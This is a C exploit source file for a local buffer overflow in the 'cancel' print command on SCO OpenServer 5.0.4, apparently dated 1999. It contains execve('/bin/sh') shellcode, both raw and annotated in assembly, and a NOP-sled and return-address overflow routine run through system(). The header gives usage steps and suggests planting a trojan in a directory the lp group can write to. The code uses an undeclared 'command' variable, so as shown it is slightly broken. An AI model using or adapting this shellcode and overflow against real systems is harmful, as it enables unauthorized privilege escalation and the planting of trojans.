/*
 * <xcancel.c> Local group 'lp' exploit 
 *
 * Offset: cancel (SCO OpenServer 5.0.4) 
 * 0 -> from gdb
 * 100-200 (usually 120) -> from shell  
 *
 * Usage: 
 * $ cc xcancel.c -o xc 
 * $ cancel 1 ´xc 120´
 *
 * By: Fuego Fatuo of t0s (Murcia/Spain - 3/7/99) 
 *     <fatuo@t0s.org>
 * Thanks to: The Dark Raver for his lessons (and shellcode ;)
 *
 *
 * Not root id :( but in /opt/K/SCO/... there is a directory 775 owned by bin.lp
 * if the admin uses the lp-programs you can put a troyan 
 *
 *
 */ 


#include <stdlib.h>
#include <stdio.h>

char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"\xeb\x1b" // start: jmp uno 
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 
*/

                       
#define RET 0x80474a0 	// SCO OpenServer 5.0.4
#define LEN 1300
#define ALINEA 1

                       

int main(int argc, char *argv[]) {

char buf[LEN];
int i,offset;

if(argc<2) {
	printf("Usage: %s <offset>\n",argv[0]);
	exit(-1);
}
else  {
	offset=atoi(argv[1]);
}
memset(buf,0x90,LEN);
memcpy(buf+20,hell,strlen(hell));
for(i=20+strlen(hell)+ALINEA;i<LEN-4;i+=4)
	*(int *)&buf[i]=RET+offset;

sprintf(command,"cancel 1 %s",buf);
system(command);
/*for(i=0;i<LEN;i++)
	putchar(buf[i]);
*/
exit(0);
}